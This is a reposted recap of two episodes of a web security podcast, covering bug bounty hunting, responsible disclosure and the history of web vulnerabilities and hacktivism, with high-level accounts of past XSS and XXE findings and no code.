Undetected e.02 recap: Fredrik N. Almroth – Bug Bounties – 10 minute mail

Bug bounties – some argue that this is one of the buzzwords of the decade in the cybersecurity industry. Whatever you want to label it, it’s a trend that we can’t ignore these days. A lot of companies are taking part in it, so what’s it all about? 

There were many valuable soundbites to take from this, and especially from podcast guest, Fredrik N. Almroth (@almroot) because he’s hacked all the tech giants and more. If you can name it, he’s probably hacked it. We’ve taken highlights from this bug bounties episode, and the dialogue has been edited for brevity. Let’s dive in:

Disposable mail Co-founder and security researcher Fredrik Nordberg Almroth

Image: Fredrik Nordberg Almorth, Disposable mail co-founder and world-class bug bounty hunter

Undetected – a web security podcast is a Disposable mail production that uncovers different depths of web security. You can listen to the full length of Episode 2 on SimpleCast or your preferred podcast platform. The video version is also available online.

Fredrik and his take on the evolution of web security

Fredrik: Well, I’m a security researcher and co-founder of Disposable mail and… I hunt for bug bounties, which kind of correlates to how we do things in Disposable mail. I started already in high school … when I met my fellow co-founders of Disposable mail. By that point we realized that, well the Internet is quite broken. This was back in 2006 when we first met and by 2008, we decided to start a consultancy business doing penetration testing. But one thing led to another and we started automating things and this idea kind of grew. So we all went to university and dropped out one after another. And by this point, some ideas started to stick, like crawling is pretty good to find your URLs on the website and if you have query parameters in URLs then you can start looking for SQL injection.

Then Cloud started becoming a buzzword around here in Sweden. So we figured why not make a new company doing something else.

Laura: We have taken quite huge strides when it comes to security in these past few years as well. How do you feel that automation, for example, played into this?

Fredrik: You can say that some vulnerabilities come and go, SQL injection was a lot more out there a couple of years ago, but now it’s mostly been abstracted that way by different frameworks and so forth. But at the same time, you now have like server-side template actions, and it’s basically the same kind of injection attack state. 

They come and go, but in different forms over the years. Now there’s more out on the internet, more services, more technologies in general. There are more things, hence more things can break, but at the same time, the vulnerabilities that exist back then, are not as common nowadays except for XSS.

Laura: It (web security) really evolved and the hacks in general. The Tesla hack you did was a cross-site scripting attack. Right?

Tesla DOOM DOM XSS

Fredrik: Tesla was running Drupal at the time, and Drupal was bundled with a “what-you-see-is-what-you-get” kind of editor called CK editor, and this library bundles with an example file. So using this example file you could do a drag-and-drop XSS where you can drag something that looks okay on one website onto some other place, and it executed in Tesla’s origin… And then you have cross-site scripting – Tesla DOM DOOM XSS. So what I demonstrated was you could play Doom on Tesla’s website, and I replaced the entire window with the game Doom.

Laura: That sounds like fun. Couldn’t play Doom anywhere else?

Fredrik: Yes, it’s, well I packed away this payload because it was fun. So I use it every now and again in various cross-site scripting demonstrations.

Getting read access on Google

Laura: Also a bigger vulnerability that you found previously was back in 2014 when you found an XXE vulnerability in Google. Basically you were able to run your own code on Google’s server. 

Fredrik: While the company wasn’t low on cash yet, Mathias Karlsson (a co-founder) and I figured that bug bounty actually works as a way to collect some money. So what’s the most bang for the buck? What companies are out there that we can hack and get the most money for the least amount of effort? Facebook or Google.  

Well, Facebook is not very fun to target, so we went for Google. Our approach was: we should find the newest features and products or go for the really old legacy stuff that they might’ve forgotten. So using Google search itself, we found a feature that dated earlier than 2008 called the Google toolbar button gallery. So if you remember this way back in the Internet Explorer, you had this toolbar from Google and companies could upload their own buttons to this toolbar and that was the feature we attacked. This was an XML file uploaded to Google.

You as a website owner could add your own button to the toolbar so that other users could find you. This button definition was an XML file and quite frankly, you can do a lot of weird things in a plain vanilla XML file, and an external entity is one of those.

Fredrik: We uploaded a file and gave it some name and description, etc, but we added a definition that instructed Google to try to read another file from their local file system. So we tried to pull the normal user file on Unix systems and uploaded it and it worked. But we asked, “Okay, did anything actually happen?” 

We made another attempt where we changed the title to something like “hello world”, and then searched on Google or for toolbar buttons containing “hello world.” … meaning we searched for what we just uploaded.

Laura: That’s kind of like local file inclusion.

Fredrik: Yeah, that’s basically the impact. We got read access on Google.com. This was quite fun. So from start to stop, it took us four hours to identify, exploit and have it reported.

Start of bug bounty career:

Laura: Were these all bug bounty programs or were they public programs that you enrolled in or how did you stumble across these?

Fredrik: This was about the time that we actually founded Disposable mail and bug bounty started becoming something you spoke about on Twitter. So Google, in my world, was the first company I saw that had this kind of policy, meaning anyone can hack Google. If they manage to do it and Google accepts it as a new unique vulnerability, you get money for it and afterward, you can speak about it. As an early-stage startup, this was nice to have some material to be seen and heard.

Laura: How did people react to your work on bug bounties back then?

Fredrik: It varied. People in Silicon Valley know about this as that’s kind of where this entire industry started. But over here in Sweden, it was unheard of that this was even a possibility. For example, a friend’s friend of mine happens to work for the Swedish Police and I told him about the Dropbox hacking event which I attended in Singapore, and his response was, “What? You can’t do that? That’s criminal.” I said, “No, no, no, you missed the point.” I had to elaborate a bit on what bug bounty is and so forth.

Laura: In our bubble of Infosec, everyone knows what a bug bounty is or what responsible disclosure is, but outside of this immediate bubble, it is not that obvious. What is your short description of bug bounties?

Fredrik: Bug bounty is freelance penetration testing in a way. Anyone on the Internet can go to a company, find a vulnerability and have a streamlined process of reporting it to the company. If it’s a unique vulnerability and you are the first one to submit it, then you get a monetary reward at the end. Now we have platforms and marketplaces to facilitate this among vendors and researchers such as Bugcrowd, HackerOne and Synack.

Laura: Yes and bug bounties are offering a [monetary] reward in exchange for the vulnerability report or swag.

Responsible Disclosure Policy – that’s all it takes:

Laura: These bug bounties have basically lifted hackers out of the darkness, and now hackers can actually talk about what they have found. They can disclose it, depending on the program. It’s also shedding a more positive light on hackers.

Fredrik: Indeed. But I think it’s quite important to speak a bit about Responsible Disclosure programs as well, since it’s basically the first stepping stone to do something like this. It could be as simple as having an email address or a contact form where someone can submit vulnerability information. That’s all it takes.

More often than not, you (an ethical hacker) know it yourself that there are vulnerabilities all over the place, but it can be quite tricky to report it.

And you (application owner), you don’t always have to offer swag or money. You just have a channel to accept it.

Laura: A common practice out there is putting a security.txt file in your domain so that people find the contact information of your security personnel there for reporting.

Is this the minimum thing that a company should do in terms of Responsible Disclosure?

Fredrik: Security.txt is a very good starting point. With that, you can set up a [email protected] email (to receive reports).

Laura: So you don’t need to go on a commercial bug bounty platform and open a program there?

Fredrik: No, I think that should come a bit later once you have matured your security processes, so you know what you get basically. It can be quite overwhelming if you go directly to one of these platforms, open a bug bounty publicly to the world because everyone will start reporting straight away.

Laura: Do you think that a company who enlists in a public program will get a ton of reports right from the get-go?

Fredrik: More in the beginning, and then it should probably slow down.

Laura: Would it make sense then to do some kind of security assessment before that?

Fredrik: Yes. I think you should only start with a Responsible Disclosure Policy. 

Once you’ve had your pentest reports, some automated scanning and an organization that can handle the security reports, then you should consider a Responsible Disclosure Policy or a private bug bounty program. After that, you could make it public.

Laura: Do you feel that offering a bug bounty program is appropriate for all sorts of companies out there?

Fredrik: Yes, I think so as long as you have some kind of online presence. But it has to be something technical. It’s quite hard to have a bug bounty otherwise. Even manufacturers of hardware, for example, are growing with IoT applications. These could open up as bug bounty programs.

Laura: Yeah. I’m just trying to think of something that wouldn’t have an online presence these days.

Fredrik: But Everything has, right?

Laura: Yeah. Everything has at least a company website, if nothing else.

Fredrik: Exactly. You always have something important to your business and you can probably make a bounty program around that. Ask yourself what you are trying to protect. Say you are Dropbox. The most sensitive things would be your users and their files, right? If you’re Apple, well, it’s basically everything, that’s a bad example I guess. For a bank, it’s probably the money.

So then it doesn’t really matter if it’s only one domain. That’s the scope for your program. You should really try to think about this, “what am I trying to protect?” and make a policy thereafter.

Setting the scope of your disclosure program:

Laura: You mentioned “Scope”, and the scope in a bug bounty program is defined by the company and it can be a domain or source code or some device.

Fredrik: Yes, it’s usually along those lines. It’s one or several domain names that can be mobile apps, GitHub repositories, etc. If it’s a hardware manufacturer, it could be their devices to sell to consumers. There are a lot of blockchain companies that would be attacking the blockchain technology itself.

Laura: What is the best scope for you as a bug hunter?

Fredrik: For me privately, the bigger scopes the better. Being a security researcher, you have a bit of an arbitrage. The more things that are exposed and that you can audit, the more things will break, as simple as that. The bigger the company, the easier it is in my opinion, and that’s because a bigger scope means more critical vulnerabilities and that’s more business impact. So it will help you as a company even more.

Laura: So what happens if you go outside of a scope in a bug bounty program?

Fredrik: That really depends on the organization. What really matters in a bug bounty program is the business impact that an outsider can have. So unless something is explicitly out of scope, it could be fine to report a vulnerability if it has a proven impact.

That’s my take on it. Although that could also be considered scope creeping if you do this.

Laura: What is scope creeping?

Fredrik: You go a bit out of scope and in again. For example, if you find something on Adobe and you go outside to some local subsidiary or something and then back into scope. More often than not, it’s generally accepted on these live hacking events. 

Laura: Maybe at the live hacking events, the overall environment is easier to control than hacking otherwise.

Fredrik: In these events, they collect a group of people to hack a company over a day or two in person. Then you have all the stakeholders at one place they can communicate about it.

Laura: Do some security researchers not report something if it’s out of scope and if it’s not that critical?

Fredrik: 100%. I really believe so. For example, Open Redirect is no longer on the OWASP Top 10. Finding an open redirect somewhere on a subdomain that might be explicitly out of scope and while you know it’s there, you wouldn’t report it with the risk of losing a score or a reputation or what-not on one of these platforms.

But at the same time ,if they have Oauth and misconfigured, I can use it to do some kind of authentication bypass or steal some sensitive tokens. Then all of a sudden you’re out of scope, then go in again, and you might have an account takeover and that would be usually considered critical.

And that companies would accept.

Laura: So it really depends on the impact and if you can demonstrate the impact.

Fredrik: Exactly. That’s, I think that’s the moral of the story. It’s the impact that matters. You need a proof of concept. Otherwise it’s kind of a void report.

Laura: Yeah. Because I used to work as a pentester and during an assignment you have limited time as well, so you don’t always have to provide the proof of concept. Pentesters look at it from a wider angle and they can see white box, the infrastructure, the servers and so on. So for me, it’s interesting how impact-driven the bug bounty community is. It’s a good thing.

Bug bounty is a growing industry

Laura: Bug Bounties have become a big industry but it has also gotten some criticism or scrutiny over how many active researchers there actually are, like this Dark Reading article by Robert Lemos on how bug bounties continue to rise. But the market has its own 1% problem

It’s kind of like the same as being a professional in anything, like a professional basketball player. And I think that was also something that was said here in Lemos’ article that was most likely a quote from Mårten Mickos that not everyone is going to succeed. And then there’s a group who succeed are really, really good at what they do.

Fredrik: Right. A lot of people are drawn into what they see on Twitter and the media that bug bounty is a growing thing. People go around on these live events where it’s an open environment and everyone always finds something critical, which is true. But to get there, that’s the hard part.

A vast majority might not have a professional take on how to report vulnerabilities, and then it might be people like yourself coming from pentesting background without experience on the same style of reporting.

Laura: … And having all of them rejected.

Fredrik: That’s the thing, right? If you go in with the mindset of a pentester, then I don’t think you would grasp it well, and it probably would be a bit discouraging. And once you get the grasp of it, then you need it to beat the rest that are in the game with vulnerabilities that will be accepted. So I think it could be a steep curve to get into.

Laura: You have been active since 2013 so you’re well ahead of people who are only starting out now. What are tips you have for beginners when trying out bug bounties?

Fredrik: Learn by doing. Submit reports and see how it works, and when it works. There are a lot of good resources out there and streamers that speak about how to do bug bounty, and educate people on what to look for.

Laura: What do you recommend?

Fredrik: I’m going to be a bit biased here, and recommend our fellow coworker, TomNomNom. I also like STÖK, a Swedish researcher.

Anything that Bug Bounties aren’t good for?

Laura: What is something that bug bounties are not really good for?

Fredrik: It’s not a silver bullet to your security. It’s a nice addition to an already quite mature organization in terms of security. It’s the many-eyes principle meaning you have more people looking and trying to break something – and someone will eventually be able to do that. 

If you start a bit premature with doing bug bounties as a company, chances are that it will be a bad experience for researchers. For example, it sucks for me if I report a vulnerability and it gets flagged as a duplicate. I’m probably not the first one to be flagged as a duplicate.

Laura: Or if the companies are slow to respond?

Fredrik: Yes. It must be horrible for the company as well. They get an overwhelming amount of reports as they can’t act on it fast enough, so then it’s not nice for anyone.

Start with private and then slowly expand the scope and amount of people that participate in your program and have it as an addition.

Laura: It’s a good way of getting rid of those low hanging fruit and understanding what you’re exposing there?

Fredrik: No, on the contrary. The bug bounty community will find all of it. They will find the XSS’s. If you can’t fix the XSS fast enough, then you will have a problem.

Laura: You will have multiple reports on the same XSS.

Fredrik: Yes, you will. The best researchers tend to go for more creative vulnerabilities and you want them to be looking deep into your system and catching hard-to-find things.

Laura: Do you think that all companies get equal treatment from bug bounty hunters as well?

Fredrik: No, I don’t think so. It’s absolutely a monetary interest. There are more and more companies joining these platforms, and there’s a limited amount of researchers that provide value. So then you have to compete with other programs to have researchers look at your stuff.

Researchers like big scopes

Laura: We’ve had multiple takeaways for our listeners in this episode already, but do you have any like one big takeaway for our listeners?

Fredrik: If you’re a company, start small, then expand. Researchers love big scopes, so try to reach that eventually. 

If you’re starting off with bug bounty hunting, don’t give up too soon. It takes time and practice to get into this, but it’s not impossible. Anyone can do it. Really. It’s just problem-solving.


Did you like the highlights of this episode? Check out the full episode in the web player. It’s also available on Spotify, Apple Podcasts, Google Podcasts or another preferred podcast platform.

——

Keeping up with the fast-pace of web security is a challenge if you are only relying on standard CVE libraries and annual security checks. Disposable mail works with some of the best ethical hackers in the world to deliver security research and modules from the forefront of security, so you can stay on top of emerging threats. Interested in giving Disposable mail a go? Start your 14-day free trial today.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Undetected podcast e.01 recap: The evolution of web security and hacking – 10 minute mail

Web security is like an onion, or maybe the deep sea, where there are depths to be uncovered. This is precisely what Undetected – a Web Security Podcast by Disposable mail is set to do. Our new podcast series is hosted by Disposable mail Security Researcher, Laura Kankaala. Each session, she invites a guest speaker to discuss some common security topics from another perspective, and other topics that may not have ever crossed your mind.

Undetected - a web security podcast by Disposable mail artwork

In the pilot episode, Laura is joined by Disposable mail co-founder Johan Edholm. He co-founded the company back in 2013, and is still involved with the organization today by managing the technical infrastructure in the clouds. We don’t want to give away too much, but there are some things said that are just too good to not be highlighted and we’ve summarized of some of the conversation:

This episode discusses the evolution of web security, and starts off the discussion on its current state by first going back to where the Internet began for them. Both Laura and Johan are from the same generation, yet their first experiences with the Internet differ.

Guest speaker Johan Edholm (left) and Host Laura Kankaala (right)

Do you remember when your first interaction with the Internet was?

Johan: I remember in the early days we didn’t have the fast Internet connection we have now. Actually, we weren’t even allowed to use computers, really, at home. My dad’s a farmer, and he believed you should work with your hands, and computers are bad… It was very different, everything was slow and taboo, I guess.

Laura: I remember when we got our first computer… it was more like, everyone got to use it. We didn’t have it online but my sister and I used to play a lot of video games.

Johan: We were not really allowed to do that, because dad had his tax documents on the computer and he would say, “Oh no, you’re going to get a virus, and everything is going to be terrible.” We weren’t allowed to touch it. When he was out working at the farm, I actually snuck to his computer anyway, and used it. I remember having to print out into text files to read offline.

Laura: My first experience was with making websites using Geocities, a hosting platform for websites. I also had my first hacking encounter here: my friend’s website was hacked and the person just changed the wallpaper on the website. I thought, “oh, is this hacking? Wow. Who would ever do this?”

When did you first experience hacking or web security?

Johan: IRC was a big part of my early time on the Internet, and security. I got into security fairly quickly, when it came to IT. I wasn’t much of a casual Internet surfer… but I’ve always been interested in this magic kind of thing. Before that, it was more literal, the sleight of hand and illusions. I think hacking has the same feeling. If someone does something that’s out of this world, I want to understand how the fuck that works. It annoys me when I don’t. That’s when I started to look into it, and that was fairly quick into this whole Internet journey, I guess.

I read a lot of those magazines, or similar texts where people were talking about hacks, and I guess those were probably the earliest experiences of things being hacked, without me actually seeing it for myself, just reading about it.

What about phreaking?

Johan: Back then, hacks were mainly teenagers pranking, and phone phreaking was a big thing because way back you didn’t have the Internet, but you had phones. Maybe you wanted to call someone, and it was really expensive so people wanted to bypass that. If you read Kevin Mitnick’s book, Art of Deception, he uses it a lot when he’s doing other shenanigans like social engineering.

Laura: Yeah, Kevin Mitnick is probably one of the OG hackers out there.

Johan: He’s definitely one of the most famous, at least. He was chased by the FBI, and was on their top wanted list for a bunch of years. He has written a lot of books regarding social engineering, and security in general. And I’ve read Art of Deception myself. It was a long time ago, that was in my early, early days of security, I’d say. But that one is fairly good when it comes to social engineering. 

How did the industry look when you started working with security?

Johan: In 2008, myself and the other founders turned 18, so we could actually register our first company. But I think it started 2007, just not too serious. We were just nerds, trying to build something because it’s fun.

Laura: What was the initial thing that you were working on?

Johan: It was the same scanner as we’re having now [in Disposable mail]. We wanted to automate security. Back then, the idea was to maybe be consultants since that was what everyone was doing, so it seemed like an easy thing. But then we’re lazy, so we figured we could just automate. Might as well, right?

Then, this whole cloud thing was growing, and I guess we were early jumping on that train.

Laura: Nowadays, we have: bug bounties, consultants, pentesters, a lot of people working in this field and it’s constantly growing. How was it back then in 2008?

Johan: How I remember it was that security people were mostly consultants. Of course, you had these security products, but generally, things moved slowly and were enterprise-y. Security was very much a product for the enterprise and for people with money. It’s not like a 10-people company would hire a pen tester. That’s usually very expensive.

Also, the vulnerabilities you saw were simpler. It’s getting more and more complex now with bigger systems. You need to find flaws in how they interact with each other. Back then, it was often quite straight forward. I think that’s a symptom of this: few people that could afford security. 

Bug bounties weren’t a thing then. I know Netscape had one around ’95, but nobody knew about it. Or, at least I didn’t. That’s not web. It was the browser, not the Internet itself. The whole feeling around it was very different.

Laura: What were the top three vulnerabilities at the time?

Johan: My feeling is that it was mostly SQL injections, those were very common. They had a very large impact. They, of course, are still around a bit today, but it’s much, much more rare. Back in the days, those were everywhere.

Then, remote code executions, they were, compared to now, much more common. It’s very basic. Now, you have SSRF, rather, which is the new RCE, almost.

The third? I would say file inclusions, like local or remote, even. They were fairly big as well, if you count the impact.

One thing that’s stayed is XSS. These vulnerabilities might have changed shape, but are still around, and probably even bigger now.

 

RCEs today:

Laura: What you said about the RCEs and and comparing them to SSRFs is interesting in that you think they are the new RCEs.

Johan: That’s more or less what we see nowadays. When you get that impact, it’s usually not the standard RCE. Before we could really have RCE in a query string, like in the URL.

Now things are much more complex, so you use the complexity of an application against itself. It makes things really hard to detect, I think, as well. Or, harder at least, to detect those kinds of things often.

What about Hacktivism?

Laura: One thing that I feel has changed, also, over the years, is the role of hacktivism.

Johan: Yeah, I think so too. I would attribute that, partly, to bug bounties. Now, people have a legal alternative to make a lot of money, even, on hacking. Back in the days, people wanted to have fun. Pranksters or teenagers were defacing websites, or changing the background and look of a website, to spread a message, or just because they were bored.

Laura: Yeah, it feels like, back in the days hacking was more political. Hacktivism basically stands for having some kind of political agenda, or some kind of bigger agenda behind hacking. For example, collectives such as Anonymous.

Johan: Yeah, that’s my impression as well and maybe they’re just more careful or hidden. Maybe they do a lot of things behind the curtains that we don’t see, and they could, for example, dump things to Wikileaks.

Back then, people really wanted to make a name for themselves, as well, often tagging releases with the group name, like Anonymous. There was also Lulzsec, that was fairly big in this. I’m not sure if they had much of a political message, to be honest, but at least they liked to tag it.

Going from hacktivism to bug bounties:

Laura: I think bug bounties have made a difference for individuals when it comes to security, because now they have a platform for reporting these things as long as they stay in scope, and work accordingly to the agreed rules and policies in there.

Johan: People often hack for the challenge. Now, when they have a legal alternative to it, they can brag about it on their high score lists rather than having to deface a website, and write their name on it. They have a more ethical alternative, which is very good.

Hacktivism is not completely dead:

Laura: Hacktivism is not completely dead, though. For example, just recently, a hacker going by the name of Phineas Fisher announced a bug bounty program for hackers, basically.

Johan: That was also delivered as one of those pure text files, that are very popular. I read it, and it brought a lot of nostalgia, to be honest. That was a very strong political statement, and something one often saw, I think before our time. I’m born ’90 and I think that style was more common in the ’80s. But the message that’s in that is a lot like, “Fuck Capitalism.”

Laura: For example, this is a quote from that manifesto. They said that, “Hacking to obtain and leak documents with public interest is one of the best ways for hackers to benefit this society.” I think this is an interesting message. Naturally, I think it’s not that outdated, but when it comes to Responsible Disclosure, or Bug Bounties, these kinds of ideas don’t typically come out in bug bounties. Rather they never, because in bug bounty programs they ask you not to leak information, or to responsibly disclose the vulnerabilities that you find.

Johan: We might call it responsible disclosure, but I guess, the hacker in this case would not call that responsible… This hacker claims to be a she, so I’m going to refer to that. She says rather, how to best benefit society by leaking documents, etc. I guess it’s very subjective, what’s responsible in that case.

Laura: Absolutely. They are also offering up to $100,000 for hackers who are able to leak some kind of documents. I don’t know where this money comes from, but they are paid in Bitcoin or other cryptocurrency. I consider this hacktivism when one is asking for these kinds of leaks.

Becoming IT security professionals:

Laura: We are both working as professional security people today. When I was studying, for example, it never occurred to me that I could be a pentester. Only when I entered the IT field, and I worked as a SysAdmin for a bit, was I able to change to a pen tester role. Only then I understood that, okay, this is actually a career, and you can make a career out of this.

I think you had this realization much earlier than I did, because back in 2008, you were already in this line of work.

Johan: My dad’s a farmer, he worked with his hands, and his dad was also a farmer, on the same farm even. On my mom’s side, they were plumbers. So, for me, I never saw it as a possibility to work within the IT field. That was something you did as a hobby, like playing chess or something.

I remember when that clicked for me, it was when I saw there was a school that I actually ended up going to, an IT school here in Stockholm. I was like, holy shit, you can actually work with this? Is that a profession? I had never accepted that. All the way until 2007, or 2008, it wasn’t that big, you didn’t hear that much about it then. I’m not sure if I really realized that security specifically could be a profession for me, either.

I honestly wasn’t even sure if I wanted to work with IT. It was more like, I think it’s fun, and I find it fairly easy. But, do I want to have this as a profession or as a hobby?

Shifting everything to be online:

Laura: A lot of our lives are actually happening online. We have social media, we have our banks, our health, everything is online. It has also become more profitable to hack into these things, also for personal gain. If you are a malicious actor, and you are able to hack into a company, or steal data from them, that can be directly profitable for you, if you sell that data on illegal marketplaces.

Johan: Yeah, exactly. I’d say, further back people mostly had websites to show where they had their store, maybe. Now, you have the store online, and you have all the user records there: who buys from you, and maybe even their history, etc. All that can be valuable for some people. If nothing else, it could be useful for doing other attacks, like spear-phishing attacks (scamming people by stalking them) which make these kinds of scams much more successful.

You have a higher incentive to actually hack things. You don’t have to go through your house to break in to look at them, you can do it overseas. It’s a very easy way to be a criminal as well, I guess.

Do you feel that the security landscape is getting better?

 

Johan: Yeah, I would definitely say it is, actually. We’re getting better at both defense and offense. It’s harder now than it was 10 years ago to get into a fairly good security level. Because we have evolved, you have to understand more things, and you have to work your way to patch a lot of the common problems. There are a lot of frameworks that, by default, aren’t vulnerable to SQL injections.

When you use frameworks, one patch can fix a lot of things, and I think we have been fairly good at that, by raising the security awareness. Of course, there are still a lot of good hackers, and you can still make mistakes, but I would say it’s better now.

Laura: More on that, the frameworks already have these built in mechanisms to mitigate this, they filter the input or the output that comes to or from the web application, so that using those web applications is more safe for end users today.

Johan: We have learned by our mistakes, and switching it to be safe by default. If you have some edge case where you don’t want that kind of security mechanism for some reason, it’s an opt-out, rather than opt-in. I think that’s really the change we have seen, and that we will hopefully continue to see.

Laura: Today there are a lot more tools that can provide automated security. And there are also consultants, and a lot of different kinds of pentesters, with different knowledge and focus areas. It’s easier to also buy security, these days.

Johan: If you feel you have the resources to actually fix things, you can also start a Responsible Disclosure program. You don’t even have to pay people, but people might look at your things anyway. Or, if they accidentally find something, they know how to contact you.

Responsible Disclosures can be fairly useful, because people can show it off on their resumé to help their career or online profiles, so they get invited to [private] bug bounty programs. There are a lot of those as not every [organization] wants to be public with their bug bounty program. 

It’s a win, win. You get help with your security, and they get credit for it, of course.

Laura: Yeah, absolutely. I think there must be some people who just want to do this out of good will, as well.

Johan: There are people that are doing security for charity, for example Hackers for Charity. Where they actually just purely do it out of good will. I would expect some people maybe want to exercise their skills just to get a technical challenge.

We’ve talked a lot about the past and the current state of security, and the new trends that have been emerging. But, where do you see us going from here?

Johan: I think all these frameworks, or CMSs, or even programming languages will become even better at making people make good decisions, when it comes to security. So, security by default, or maybe even have it as Theo de Raadt, the creator of OpenBSD, says something like, “Optional security is irrelevant,” where you don’t have a choice. But, I think we’ll become better at that.

Of course, automation is a thing, definitely. Quite obvious, in this case, when it comes to Disposable mail since that is what we do. But I really believe in that. As I mentioned, it’s harder and harder to get into the field of security, and there are fewer and fewer [individuals] that are doing this original [security] research. So we need to distribute that knowledge.

The futuristic way of security with automation and hacker collaboration:

Johan: Not everyone can learn to hack that well, and those insights shouldn’t be only for those few that can, or the few that can afford to hire these people. If you look at Google’s bug bounty program, or Facebook, or some others, they have an enormous budget. Obviously, that won’t go for everyone.

It’s not just the organizations themselves that would suffer from this, it’s all the users of the smaller websites, and organizations. What we need to do is find ways to distribute that knowledge, to spread that knowledge so we can get a more secure Internet experience.

That’s partly what we do. We try to take this knowledge from the few [Disposable mail Crowdsouce], and automate it so it can reach much more people. But knowledge would also go into those open source tools, or CMSs, or similar. I think that’s a futuristic way to look at security. At least, that’s what I believe, and hope for as well, so we don’t get this too-centralized where there’s a few services that you feel like you can’t actually trust because those are the only ones that can afford this kind of thing. It’s not just super big enterprises and nation states, it’s [security] actually more for everyone.

Ultimately, we need to protect the end user:

Laura: Absolutely. Even though companies need to be the ones enforcing security, a lack of security will always affect the end users in one way or another. Either their data is compromised, or their devices are compromised. The target for malicious actors is either a group of people, opportunistically everyone, or a really specific target, like one person.

Johan: That’s a lot of the point. If your company gets hacked, of course you as a company will suffer, it will damage your brand, and might have a lot of financial costs and things, but it also affects everyone that’s using your service. Or, if they have their personal data on that service, maybe other things that are even more sensitive ,… like Bitcoin wallets, that could have a huge cost for people.

Something more subtle would be like your email being leaked so now you get a lot of spam. That’s annoying, but it could lead to a lot of different things, depending on how you use it, and what kind of company it is. The point is, it’s not just the organizations that suffer, it’s all the users of it. We need to help everyone be more safe, or secure.

Full video episode on Wistia or find it on the Disposable mail Youtube channel:

Did you like the highlights of this episode? Check out the full episode of Undetected podcast and following episodes in the web player. It’s also available on Spotify, Apple Podcasts, Google Podcasts or another preferred podcast platform.

——

Keeping up with the fast-pace of web security is a challenge if you are only relying on standard CVE libraries and annual security checks. Disposable mail works with some of the best ethical hackers in the world to deliver security research and modules from the forefront of security, so you can stay on top of emerging threats. Interested in giving Disposable mail a go? Start your 14-day free trial today.

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.